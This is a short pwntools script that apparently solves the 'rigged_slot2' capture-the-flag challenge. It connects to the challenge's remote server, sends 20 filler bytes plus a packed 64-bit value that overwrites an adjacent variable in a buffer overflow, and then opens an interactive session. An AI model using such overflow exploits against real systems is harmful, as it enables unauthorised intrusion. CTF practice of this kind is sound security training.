#!/usr/bin/python3

from pwn import *

context.binary = target = ELF("./rigged_slot2", checksec=False)
# r = process()
r = remote("riggedslot2.ctf.intigriti.io", 1337)

# funcs
s = lambda a: r.sendlineafter(b":", a)

# buf
buf = b"A"*20 
buf += p64(1337421)
s(buf)
s(b"1")

r.interactive()